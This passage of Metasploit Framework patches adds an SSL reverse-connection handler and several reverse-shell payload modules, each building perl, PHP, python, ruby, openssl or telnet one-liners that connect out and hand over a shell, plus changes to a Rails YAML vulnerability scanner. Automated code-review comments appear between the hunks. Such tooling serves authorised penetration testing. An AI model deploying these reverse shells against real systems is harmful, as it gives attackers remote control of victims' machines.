'TCP connect-back payloads cannot be used with Proxies' + end + + ex = false + # Switch to IPv6 ANY address if the LHOST is also IPv6 + addr = Rex::Socket.resolv_nbo(datastore['LHOST']) + # First attempt to bind LHOST. If that fails, the user probably has + # something else listening on that interface. Try again with ANY_ADDR. + any = (addr.length == 4) ? "0.0.0.0" : "::0" + + addrs = [ Rex::Socket.addr_ntoa(addr), any ] + + comm = datastore['ReverseListenerComm'] + if comm.to_s == "local" + comm = ::Rex::Socket::Comm::Local + else + comm = nil + end + + if not datastore['ReverseListenerBindAddress'].to_s.empty? 
+ # Only try to bind to this specific interface + addrs = [ datastore['ReverseListenerBindAddress'] ] + + # Pick the right "any" address if either wildcard is used + addrs[0] = any if (addrs[0] == "0.0.0.0" or addrs == "::0") + end + addrs.each { |ip| + begin + + comm.extend(Rex::Socket::SslTcp) + self.listener_sock = Rex::Socket::SslTcpServer.create( + 'LocalHost' => datastore['LHOST'], + 'LocalPort' => datastore['LPORT'].to_i, + 'Comm' => comm, + 'SSLCert' => datastore['SSLCert'], + 'Context' => + { + 'Msf' => framework, + 'MsfPayload' => self, + 'MsfExploit' => assoc_exploit + }) + + ex = false + + comm_used = comm || Rex::Socket::SwitchBoard.best_comm( ip ) + comm_used = Rex::Socket::Comm::Local if comm_used == nil + + if( comm_used.respond_to?( :type ) and comm_used.respond_to?( :sid ) ) + via = "via the #{comm_used.type} on session #{comm_used.sid}" + else + via = "" + end + + print_status("Started reverse SSL handler on #{ip}:#{datastore['LPORT']} #{via}") + break + rescue + ex = $! + print_error("Handler failed to bind to #{ip}:#{datastore['LPORT']}") + end + } + raise ex if (ex) + end + +end + +end +end diff --git a/lib/msf/core/module/platform.rb b/lib/msf/core/module/platform.rb index d1be479c301d..357c4e724be4 100644 --- a/lib/msf/core/module/platform.rb +++ b/lib/msf/core/module/platform.rb @@ -479,4 +479,20 @@ class PHP < Msf::Module::Platform Rank = 100 Alias = "php" end + + # + # JavaScript + # + class JavaScript < Msf::Module::Platform + Rank = 100 + Alias = "js" + end + + # + # Python + # + class Python < Msf::Module::Platform + Rank = 100 + Alias = "python" + end end diff --git a/modules/exploits/multi/handler.rb b/modules/exploits/multi/handler.rb index bf541b1d4760..7996ad52ef9c 100644 --- a/modules/exploits/multi/handler.rb +++ b/modules/exploits/multi/handler.rb 
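Review bot: Inside `addrs.each { |ip|` the listener is created with `'LocalHost' => datastore['LHOST']`, so every iteration binds the same address: the documented fallback to the ANY address and the ReverseListenerBindAddress override are never applied, while the status and error messages print `ip` as if they were. It should be `'LocalHost' => ip`. In the wildcard check above, `addrs == "::0"` compares the array with a string and is always false; `addrs[0] == "::0"` was meant. `comm.extend(Rex::Socket::SslTcp)` also runs after `comm` was set to nil for the non-local case, which would extend nil itself, so guard it with `if comm`.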
@@ -32,7 +32,7 @@ def initialize(info = {}) 'BadChars' => '', 'DisableNops' => true, }, - 'Platform' => [ 'win', 'linux', 'solaris', 'unix', 'osx', 'bsd', 'php', 'java' ], + 'Platform' => [ 'win', 'linux', 'solaris', 'unix', 'osx', 'bsd', 'php', 'java','ruby','js','python' ], 'Arch' => ARCH_ALL, 'Targets' => [ [ 'Wildcard Target', { } ] ], 'DefaultTarget' => 0 diff --git a/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb new file mode 100644 index 000000000000..b675712c9aa0 --- /dev/null +++ b/modules/payloads/singles/cmd/unix/reverse_bash_telnet_ssl.rb 
@@ -0,0 +1,63 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Reverse TCP SSL (telnet)', + 'Version' => '$Revision$', + 'Description' => %q{ + Creates an interactive shell via mknod and telnet. + This method works on Debian and other systems compiled + without /dev/tcp support. This module uses the '-z' + option included on some systems to encrypt using SSL. + }, + 'Author' => 'RageLtMan', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::ReverseTcpSsl, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd_bash', + 'RequiredCmd' => 'bash-tcp', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + end + + # + # Constructs the payload + # + def generate + vprint_good(command_string) + return super + command_string + end + + # + # Returns the command string to use for execution + # + def command_string + pipe_name = Rex::Text.rand_text_alpha( rand(4) + 8 ) + cmd = "mknod #{pipe_name} p && telnet -z verify=0 #{datastore['LHOST']} #{datastore['LPORT']} 0<#{pipe_name} | $(which $0) 1>#{pipe_name} & sleep 10 && rm #{pipe_name} &" + end +end diff --git a/modules/payloads/singles/cmd/unix/reverse_openssl_double.rb b/modules/payloads/singles/cmd/unix/reverse_openssl_double.rb new file mode 100644 index 000000000000..2343ed2d69fd --- /dev/null +++ b/modules/payloads/singles/cmd/unix/reverse_openssl_double.rb 
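Review bot: generate calls command_string twice, once for `vprint_good` and once for the return value, and command_string draws a fresh random `pipe_name` on each call, so the command written to the verbose log is not the one that is returned. Build it once with `cmd = command_string`, then `vprint_good(cmd)` and `super + cmd`. The other modules added in this commit use the same two-call generate. The metadata also disagrees with the description, which says the module relies on mknod and telnet while `'RequiredCmd' => 'bash-tcp'` and `'PayloadType' => 'cmd_bash'` are declared.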
@@ -0,0 +1,68 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_double_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Double reverse TCP SSL (openssl)', + 'Version' => '$Revision$', + 'Description' => 'Creates an interactive shell through two openssl encrypted inbound connections', + 'Author' => [ + 'hdm', # Original module + 'RageLtMan', # SSL support + ], + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::ReverseTcpDoubleSsl, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'telnet', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + end + + # + # Constructs the payload + # + def generate + vprint_good(command_string) + return super + command_string + end + + # + # Returns the command string to use for execution + # + def command_string + lhost = datastore['LHOST'] + ver = Rex::Socket.is_ipv6?(lhost) ? "6" : "" + lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) + cmd = '' + cmd += "openssl s_client -connect #{lhost}:#{datastore['LPORT']}|" + cmd += "/bin/sh -i|openssl s_client -connect #{lhost}:#{datastore['LPORT']}" + cmd += " >/dev/null 2>&1 &\n" + return cmd + end + +end diff --git a/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb new file mode 100644 index 000000000000..96724f20e753 --- /dev/null +++ b/modules/payloads/singles/cmd/unix/reverse_perl_ssl.rb 
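Review bot: `'Handler' => Msf::Handler::ReverseTcpDoubleSsl` does not match the constant in the file this module requires, which patch 238 on this page declares as `module ReverseTcpDoubleSSL`; constants are case-sensitive, so unless another file defines the `Ssl` spelling this module raises NameError on load. Use `Msf::Handler::ReverseTcpDoubleSSL`. The metadata needs a second look as well: 'Name' is identical to the one in reverse_openssl.rb, and `'RequiredCmd' => 'telnet'` is declared although command_string only invokes openssl.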
@@ -0,0 +1,63 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Reverse TCP SSL (via perl)', + 'Version' => '$Revision$', + 'Description' => 'Creates an interactive shell via perl, uses SSL', + 'Author' => 'RageLtMan', + 'License' => BSD_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::ReverseTcpSsl, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'perl', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + end + + # + # Constructs the payload + # + def generate + vprint_good(command_string) + return super + command_string + end + + # + # Returns the command string to use for execution + # + def command_string + lhost = datastore['LHOST'] + ver = Rex::Socket.is_ipv6?(lhost) ? "6" : "" + lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) + cmd = "perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);" + cmd += "$c=IO::Socket::SSL->new(\"#{lhost}:#{datastore['LPORT']}\");" + cmd += "while(sysread($c,$i,8192)){syswrite($c,`$i`);}'" + end + +end diff --git a/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb new file mode 100644 index 000000000000..9892515e26a5 --- /dev/null +++ b/modules/payloads/singles/cmd/unix/reverse_php_ssl.rb 
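Review bot: `ver` is computed in command_string and never read; the line `ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""` can be deleted. reverse_openssl_double.rb and reverse_php_ssl.rb in this commit carry the same dead local, and the PHP module additionally builds a bracketed `lhost` that its command string then ignores in favour of `datastore['LHOST']`. The perl and PHP modules declare `BSD_LICENSE` where sibling modules in the commit use `MSF_LICENSE`; if that is intentional, a comment saying so would help.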
@@ -0,0 +1,61 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Unix Command Shell, Reverse TCP SSL (via php)',
+ 'Version' => '$Revision$',
+ 'Description' => 'Creates an interactive shell via php, uses SSL',
+ 'Author' => 'RageLtMan',
+ 'License' => BSD_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Handler' => Msf::Handler::ReverseTcpSsl,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'php',
+ 'Payload' =>
+ {
+ 'Offsets' => { },
+ 'Payload' => ''
+ }
+ ))
+ end
+
+ #
+ # Constructs the payload
+ #
+ def generate
+ vprint_good(command_string)
+ return super + command_string
+ end
+
+ #
+ # Returns the command string to use for execution
+ #
+ def command_string
+ lhost = datastore['LHOST']
+ ver = Rex::Socket.is_ipv6?(lhost) ? "6" : ""
+ lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+ cmd = "php -r '$s=fsockopen(\"ssl://#{datastore['LHOST']}\",#{datastore['LPORT']});while(!feof($s)){exec(fgets($s),$o);$o=implode(\"\\n\",$o);$o.=\"\\n\";fputs($s,$o);}'&"
+ end
+
+end
diff --git a/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
new file mode 100644
index 000000000000..a7e232d24b35
--- /dev/null
+++ b/modules/payloads/singles/cmd/unix/reverse_python_ssl.rb
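Review bot: In `command_string` the two `lhost` assignments are dead code, because the returned string interpolates `datastore['LHOST']` directly and never reads the local. The perl and ruby modules added by this same patch interpolate `lhost`, so this file is inconsistent with its siblings and the intent is unclear to a maintainer. Either drop the unused assignments or use the local throughout, and say which was meant in the method comment.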
@@ -0,0 +1,79 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Reverse TCP SSL (via python)', + 'Version' => '$Revision$', + 'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.', + 'Author' => 'RageLtMan', + 'License' => BSD_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::ReverseTcpSsl, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'python', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + end + + # + # Constructs the payload + # + def generate + vprint_good(command_string) + return super + command_string + end + + # + # Returns the command string to use for execution + # + def command_string + cmd = '' + dead = Rex::Text.rand_text_alpha(2) + # Set up the socket + cmd += "import socket,subprocess,os,ssl\n" + cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" + cmd += "so.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" + cmd += "s=ssl.wrap_socket(so)\n" + # The actual IO + cmd += "#{dead}=False\n" + cmd += "while not #{dead}:\n" + cmd += "\tdata=s.recv(1024)\n" + cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n" + cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n" + cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n" + cmd += "\ts.send(stdout_value)\n" + + # The 
*nix shell wrapper to keep things clean + # Base64 encoding is required in order to handle Python's formatting requirements in the while loop + cmd = "python -c \"exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))\"" + cmd += ' >/dev/null 2>&1 &' + return cmd + + end + +end diff --git a/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb new file mode 100644 index 000000000000..6743def9e98e --- /dev/null +++ b/modules/payloads/singles/cmd/unix/reverse_ruby_ssl.rb 
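Review bot: The `'Description'` says only "uses SSL", but the script assembled in `command_string` calls `ssl.wrap_socket(so)` with no certificate or verification arguments, so the channel is encrypted without authenticating the peer. The description should state that, for example `'Creates an interactive shell via python over SSL (peer certificate is not verified), base64-encoded by design.'`, so nobody handling engagement data assumes an authenticated channel. The same text and call appear in the python/shell_reverse_tcp_ssl.rb hunk later in this patch. `.decode('base64')` is a Python 2 string method, which deserves a comment next to `'RequiredCmd' => 'python'`.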
@@ -0,0 +1,49 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Unix Command Shell, Reverse TCP SSL (via Ruby)',
+ 'Version' => '$Revision$',
+ 'Description' => 'Connect back and create a command shell via Ruby, uses SSL',
+ 'Author' => 'RageLtMan',
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Handler' => Msf::Handler::ReverseTcpSsl,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'ruby',
+ 'Payload' => { 'Offsets' => {}, 'Payload' => '' }
+ ))
+ end
+
+ def generate
+ vprint_good(command_string)
+ return super + command_string
+ end
+
+ def command_string
+ lhost = datastore['LHOST']
+ lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
+ "ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end'"
+ end
+end
diff --git a/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb
new file mode 100644
index 000000000000..67af0c90728f
--- /dev/null
+++ b/modules/payloads/singles/cmd/unix/reverse_ssl_double_telnet.rb
@@ -0,0 +1,67 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp_double_ssl'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+ include Msf::Payload::Single
+ include Msf::Sessions::CommandShellOptions
+
+ def initialize(info = {})
+ super(merge_info(info,
+ 'Name' => 'Unix Command Shell, Double reverse TCP SSL (telnet)',
+ 'Version' => '$Revision$',
+ 'Description' => 'Creates an interactive shell through two inbound connections, encrypts using SSL via "-z" option',
+ 'Author' => [
+ 'hdm', # Original module
+ 'RageLtMan', # SSL support
+ ],
+ 'License' => MSF_LICENSE,
+ 'Platform' => 'unix',
+ 'Arch' => ARCH_CMD,
+ 'Handler' => Msf::Handler::ReverseTcpDoubleSsl,
+ 'Session' => Msf::Sessions::CommandShell,
+ 'PayloadType' => 'cmd',
+ 'RequiredCmd' => 'telnet',
+ 'Payload' =>
+ {
+ 'Offsets' => { },
+ 'Payload' => ''
+ }
+ ))
+ end
+
+ #
+ # Constructs the payload
+ #
+ def generate
+
+ return super + command_string
+ end
+
+ #
+ # Returns the command string to use for execution
+ #
+ def command_string
+ cmd =
+ "sh -c '(sleep #{3600+rand(1024)}|" +
+ "telnet -z #{datastore['LHOST']} #{datastore['LPORT']}|" +
+ "while : ; do sh && break; done 2>&1|" +
+ "telnet -z #{datastore['LHOST']} #{datastore['LPORT']}" +
+ " >/dev/null 2>&1 &)'"
+ return cmd
+ end
+
+end
diff --git a/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
new file mode 100644
index 000000000000..ca70b1087924
--- /dev/null
+++ b/modules/payloads/singles/python/shell_reverse_tcp_ssl.rb
@@ -0,0 +1,77 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/handler/reverse_tcp_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Unix Command Shell, Reverse TCP SSL (via python)', + 'Version' => '$Revision$', + 'Description' => 'Creates an interactive shell via python, uses SSL, encodes with base64 by design.', + 'Author' => 'RageLtMan', + 'License' => BSD_LICENSE, + 'Platform' => 'python', + 'Arch' => ARCH_CMD, + 'Handler' => Msf::Handler::ReverseTcpSsl, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'python', + 'Payload' => + { + 'Offsets' => { }, + 'Payload' => '' + } + )) + end + + # + # Constructs the payload + # + def generate + vprint_good(command_string) + return super + command_string + end + + # + # Returns the command string to use for execution + # + def command_string + cmd = '' + dead = Rex::Text.rand_text_alpha(2) + # Set up the socket + cmd += "import socket,subprocess,os,ssl\n" + cmd += "so=socket.socket(socket.AF_INET,socket.SOCK_STREAM)\n" + cmd += "so.connect(('#{ datastore['LHOST'] }',#{ datastore['LPORT'] }))\n" + cmd += "s=ssl.wrap_socket(so)\n" + # The actual IO + cmd += "#{dead}=False\n" + cmd += "while not #{dead}:\n" + cmd += "\tdata=s.recv(1024)\n" + cmd += "\tif len(data)==0:\n\t\t#{dead} = True\n" + cmd += "\tproc=subprocess.Popen(data,shell=True,stdout=subprocess.PIPE,stderr=subprocess.PIPE,stdin=subprocess.PIPE)\n" + cmd += "\tstdout_value=proc.stdout.read() + proc.stderr.read()\n" + cmd += "\ts.send(stdout_value)\n" + + # The *nix shell wrapper to 
keep things clean + # Base64 encoding is required in order to handle Python's formatting requirements in the while loop + cmd = "exec('#{Rex::Text.encode_base64(cmd)}'.decode('base64'))" + return cmd + + end + +end diff --git a/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb new file mode 100644 index 000000000000..82f61c768d6b --- /dev/null +++ b/modules/payloads/singles/ruby/shell_reverse_tcp_ssl.rb @@ -0,0 +1,52 @@ +## +# $Id$ +## + +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'msf/core/payload/ruby' +require 'msf/core/handler/reverse_tcp_ssl' +require 'msf/base/sessions/command_shell' +require 'msf/base/sessions/command_shell_options' + +module Metasploit3 + + include Msf::Payload::Single + include Msf::Payload::Ruby + include Msf::Sessions::CommandShellOptions + + def initialize(info = {}) + super(merge_info(info, + 'Name' => 'Ruby Command Shell, Reverse TCP SSL', + 'Version' => '$Revision$', + 'Description' => 'Connect back and create a command shell via Ruby, uses SSL', + 'Author' => 'RageLtMan', + 'License' => MSF_LICENSE, + 'Platform' => 'ruby', + 'Arch' => ARCH_RUBY, + 'Handler' => Msf::Handler::ReverseTcpSsl, + 'Session' => Msf::Sessions::CommandShell, + 'PayloadType' => 'ruby', + 'Payload' => { 'Offsets' => {}, 'Payload' => '' } + )) + end + + def generate + rbs = prepends(ruby_string) + vprint_good rbs + return rbs + end + + def ruby_string + lhost = datastore['LHOST'] + lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost) + rbs = "require 'socket';require 'openssl';c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new(\"#{lhost}\",\"#{datastore['LPORT']}\")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,\"r\"){|io|c.print io.read}end" + return rbs + end +end 
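Review bot: `'Name' => 'Unix Command Shell, Reverse TCP SSL (via python)'` in python/shell_reverse_tcp_ssl.rb is identical to the name registered by cmd/unix/reverse_python_ssl.rb earlier in this patch, although this module sets `'Platform' => 'python'` and `'PayloadType' => 'python'`. Two modules with the same display name cannot be told apart in listings and logs. The ruby counterpart in this patch uses a distinct name (`'Ruby Command Shell, Reverse TCP SSL'`), so `'Name' => 'Python Command Shell, Reverse TCP SSL'` would follow that pattern. The trailing comment "The *nix shell wrapper to keep things clean" was carried over from the cmd/unix variant and no longer matches, since this `command_string` adds no shell wrapper.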
From 810470de3bcb9d7719994e4b8de24d30e3c7721a Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Sun, 3 Feb 2013 16:05:45 -0600 Subject: [PATCH 240/421] Make HTTP_METHOD Configurable --- modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb index 900b8f331371..c9907e5adb96 100644 --- a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb @@ -29,7 +29,8 @@ def initialize(info={}) )) register_options([ - OptString.new('URIPATH', [true, "The URI to test", "/"]) + OptString.new('URIPATH', [true, "The URI to test", "/"]), + OptString.new('HTTP_METHOD', [ true, 'The HTTP request method (GET, POST, PUT typically work)', "POST"]) ], self.class) end @@ -37,7 +38,7 @@ def send_probe(ptype, pdata) odata = %Q^<?xml version="1.0" encoding="UTF-8"?>\n<probe type="#{ptype}"><![CDATA[\n#{pdata}\n]]></probe>^ res = send_request_cgi({ 'uri' => datastore['URIPATH'] || "/", - 'method' => 'POST', + 'method' => datastore['HTTP_METHOD'], 'ctype' => 'application/xml', 'data' => odata }, 25) From 8dff42777695ba10e9012960b1f3aa8045134bfe Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Sun, 3 Feb 2013 16:07:07 -0600 Subject: [PATCH 241/421] Allow 4xx codes, display codes in verbose output --- modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb index c9907e5adb96..64d25eb52051 100644 --- a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb 
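Review bot: `datastore['HTTP_METHOD']` is handed to `send_request_cgi` unchecked in `send_probe`, while the neighbouring `'uri'` entry keeps its `|| "/"` fallback. An `OptString` accepts any text, including values that are not HTTP verbs, and probe results from such a request are hard to interpret. An enumerated option limits it to the verbs the help text names, e.g. `OptEnum.new('HTTP_METHOD', [true, 'The HTTP request method', 'POST', ['GET', 'POST', 'PUT']])`. Both `initialize` and `send_probe` continue outside the hunks shown.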
@@ -65,11 +65,13 @@ def run_host(ip) return end - if res1.code.to_s =~ /^[45]/ + vprint_status("Probe response codes: #{res1.code} / #{res2.code} / #{res3.code}") + + if res1.code.to_s =~ /^[5]/ vprint_status("#{rhost}:#{rport} The server replied with #{res1.code} for our initial XML request, double check URIPATH") end - if res2.code.to_s =~ /^[23]/ and res3.code != res2.code and res3.code != 200 + if (res2.code == res1.code) and (res3.code != res2.code) and (res3.code != 200) print_good("#{rhost}:#{rport} is likely vulnerable due to a #{res3.code} reply for invalid YAML") report_vuln({ :host => rhost, From 57c8e41846615393e0c521645e0ad51e61a49a8b Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Sun, 3 Feb 2013 16:10:46 -0600 Subject: [PATCH 242/421] Re-order probes and checks. This causes module to exit if error conditions are found, before sending unecessary probes. --- .../scanner/http/rails_xml_yaml_scanner.rb | 16 ++++++++++------ 1 file changed, 10 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb index 64d25eb52051..e55f6f571d8d 100644 --- a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb +++ b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb 
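Review bot: The new condition `(res2.code == res1.code) and (res3.code != res2.code) and (res3.code != 200)` no longer requires a successful reply to the valid-YAML probe. A host that answers the first two requests with the same error (say a 404 for a wrong URIPATH, or a 403 from a proxy) and the third with any other non-200 status is therefore passed to `report_vuln`. That exchanges missed detections for false positives that are stored as findings. I would keep the 4xx allowance but add a comment above the `if` stating the heuristic and its known false-positive cases, and consider excluding responses that show the path does not exist. `/^[5]/` can be written `/\A5/`, and `run_host` starts and ends outside this hunk.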
@@ -47,19 +47,26 @@ def send_probe(ptype, pdata) def run_host(ip) res1 = send_probe("string", "hello") - res2 = send_probe("yaml", "--- !ruby/object:Time {}\n") - res3 = send_probe("yaml", "--- !ruby/object:\x00") unless res1 vprint_status("#{rhost}:#{rport} No reply to the initial XML request") return end + if res1.code.to_s =~ /^[5]/ + vprint_status("#{rhost}:#{rport} The server replied with #{res1.code} for our initial XML request, double check URIPATH") + return + end + + res2 = send_probe("yaml", "--- !ruby/object:Time {}\n") + unless res2 vprint_status("#{rhost}:#{rport} No reply to the initial YAML probe") return end + res3 = send_probe("yaml", "--- !ruby/object:\x00") + unless res3 vprint_status("#{rhost}:#{rport} No reply to the second YAML probe") return @@ -67,9 +74,6 @@ def run_host(ip) vprint_status("Probe response codes: #{res1.code} / #{res2.code} / #{res3.code}") - if res1.code.to_s =~ /^[5]/ - vprint_status("#{rhost}:#{rport} The server replied with #{res1.code} for our initial XML request, double check URIPATH") - end if (res2.code == res1.code) and (res3.code != res2.code) and (res3.code != 200) print_good("#{rhost}:#{rport} is likely vulnerable due to a #{res3.code} reply for invalid YAML") @@ -82,7 +86,7 @@ def run_host(ip) :refs => self.references }) else - vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or URIPATH must be set") + vprint_status("#{rhost}:#{rport} is not likely to be vulnerable or URIPATH & HTTP_METHOD must be set") end end From 5e0c18af2fcd5fddbabdd42305bef0dda51e48a4 Mon Sep 17 00:00:00 2001 From: Jeff Jarmoc <jeff@jarmoc.com> Date: Sun, 3 Feb 2013 16:14:42 -0600 Subject: [PATCH 243/421] adding self to credits --- modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb b/modules/auxiliary/scanner/http/rails_xml_yaml_scanner.rb index e55f6f571d8d..7df91ce0636f 100644 
